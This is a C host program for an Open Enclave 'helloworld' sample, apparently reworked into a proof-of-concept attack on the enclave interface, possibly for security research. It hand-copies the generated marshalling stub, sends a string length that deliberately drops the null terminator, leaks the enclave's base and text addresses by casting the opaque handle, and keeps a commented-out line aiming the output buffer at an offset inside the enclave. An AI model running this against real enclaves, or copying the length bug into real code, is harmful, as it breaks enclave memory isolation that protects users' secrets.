// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License.

#include <openenclave/host.h>
#include <stdio.h>
#include "helloworld_u.h"
#include <openenclave/edger8r/host.h>


// Include the untrusted helloworld header that is generated
// during the build. This file is generated by calling the
// sdk tool oeedger8r against the helloworld.edl file.
#include "helloworld_u.h"

bool check_simulate_opt(int* argc, const char* argv[])
{
    for (int i = 0; i < *argc; i++)
    {
        if (strcmp(argv[i], "--simulate") == 0)
        {
            fprintf(stdout, "Running in simulation mode\n");
            memmove(&argv[i], &argv[i + 1], (*argc - i) * sizeof(char*));
            (*argc)--;
            return true;
        }
    }
    return false;
}


typedef struct {
uint64_t magic;
char* image_file;
uint64_t base;
uint64_t text;
} my_oe_enclave;

oe_result_t my_handle_message_sanitize(
        oe_enclave_t* enclave,
        char* string_ptr)
{
    // This code is mainly copied from the autogenerated one

    oe_result_t _result = OE_FAILURE;

    my_oe_enclave* e = enclave;
    /* Marshalling struct */ 
    handle_message_sanitize_args_t _args, *_pargs_in = NULL, *_pargs_out=NULL;

    /* Marshalling buffer and sizes */ 
    size_t _input_buffer_size = 0;
    size_t _output_buffer_size = 0;
    size_t _total_buffer_size = 0;
    uint8_t* _buffer = NULL;
    uint8_t* _input_buffer = NULL;
    uint8_t* _output_buffer = NULL;
    size_t _input_buffer_offset = 0;
    size_t _output_buffer_offset = 0;
    size_t _output_bytes_written = 0;

    /* Fill marshalling struct */
    memset(&_args, 0, sizeof(_args));
    _args.string_ptr = (char*) string_ptr;

    // Give a wrong length (exclude the 0 termination on the host side) 
    _args.string_ptr_len = (string_ptr) ? (strlen(string_ptr)) : 0;

    fprintf(stdout, "String in host has length %d\n", _args.string_ptr_len);

    /* Compute input buffer size. Include in and in-out parameters. */
    OE_ADD_SIZE(_input_buffer_size, sizeof(handle_message_sanitize_args_t));
    if (string_ptr) OE_ADD_SIZE(_input_buffer_size, _args.string_ptr_len * sizeof(char));

    /* Compute output buffer size. Include out and in-out parameters. */
    OE_ADD_SIZE(_output_buffer_size, sizeof(handle_message_sanitize_args_t));
   
    /* Allocate marshalling buffer */
    _total_buffer_size = _input_buffer_size;
    OE_ADD_SIZE(_total_buffer_size, _output_buffer_size);

    _buffer = (uint8_t*) malloc(_total_buffer_size);
    _input_buffer = _buffer;
    _output_buffer = _buffer + _input_buffer_size;
    if (_buffer == NULL) { 
        _result = OE_OUT_OF_MEMORY;
        goto done;
    }

    /* Serialize buffer inputs (in and in-out parameters) */
    *(uint8_t**)&_pargs_in = _input_buffer; 
    OE_ADD_SIZE(_input_buffer_offset, sizeof(*_pargs_in));

    OE_WRITE_IN_PARAM(string_ptr, _args.string_ptr_len * sizeof(char));

    /* Copy args structure (now filled) to input buffer */
    memcpy(_pargs_in, &_args, sizeof(*_pargs_in));

    //uint8_t* my_output_buffer = e->base + 0xa7b9b0 - 16;
    //_output_buffer_size = 256;

    /* Call enclave function */
    if((_result = oe_call_enclave_function(
                        enclave,
                        fcn_id_handle_message_sanitize,
                        _input_buffer, _input_buffer_size,
                        _output_buffer, _output_buffer_size,
                         &_output_bytes_written)) != OE_OK)
        goto done;

    /* Set up output arg struct pointer */
    *(uint8_t**)&_pargs_out = _output_buffer; 
    OE_ADD_SIZE(_output_buffer_offset, sizeof(*_pargs_out));

    /* Check if the call succeeded */
    if ((_result=_pargs_out->_result) != OE_OK)
        goto done;

    /* Currently exactly _output_buffer_size bytes must be written */
    if (_output_bytes_written != _output_buffer_size) {
        _result = OE_FAILURE;
        goto done;
    }

    /* Unmarshal return value and out, in-out parameters */

    _result = OE_OK;
done:    
    if (_buffer)
        free(_buffer);
    return _result;
}

int main(int argc, const char* argv[])
{
    oe_result_t result;
    int ret = 1;
    oe_enclave_t* enclave = NULL;

    uint32_t flags = OE_ENCLAVE_FLAG_DEBUG;
    if (check_simulate_opt(&argc, argv))
    {
        flags |= OE_ENCLAVE_FLAG_SIMULATE;
    }

    if (argc != 2)
    {
        fprintf(
            stderr, "Usage: %s enclave_image_path [ --simulate  ]\n", argv[0]);
        goto exit;
    }

    // Create the enclave
    result = oe_create_helloworld_enclave(
        argv[1], OE_ENCLAVE_TYPE_AUTO, flags, NULL, 0, &enclave);
    if (result != OE_OK)
    {
        fprintf(
            stderr,
            "oe_create_helloworld_enclave(): result=%u (%s)\n",
            result,
            oe_result_str(result));
        goto exit;
    }

    fprintf(stdout, "Enclave struct:\n");
    my_oe_enclave* my_enc = enclave;
    fprintf(stdout, "magic = %lx\n", my_enc->magic);
    fprintf(stdout, "base  = %lx\n", my_enc->base);
    fprintf(stdout, "text  = %lx\n", my_enc->text);

    // Call into the enclave
    char* test = "AA!AAAAAAAAAAAAAAAAAABCC";
    //    char* test = "";
    result = my_handle_message_sanitize(enclave, test);
    if (result != OE_OK)
    {
        fprintf(
            stderr,
            "calling into enclave_helloworld failed: result=%u (%s)\n",
            result,
            oe_result_str(result));
        goto exit;
    }

    ret = 0;

exit:
    // Clean up the enclave if we created one
    if (enclave)
        oe_terminate_enclave(enclave);

    return ret;
}
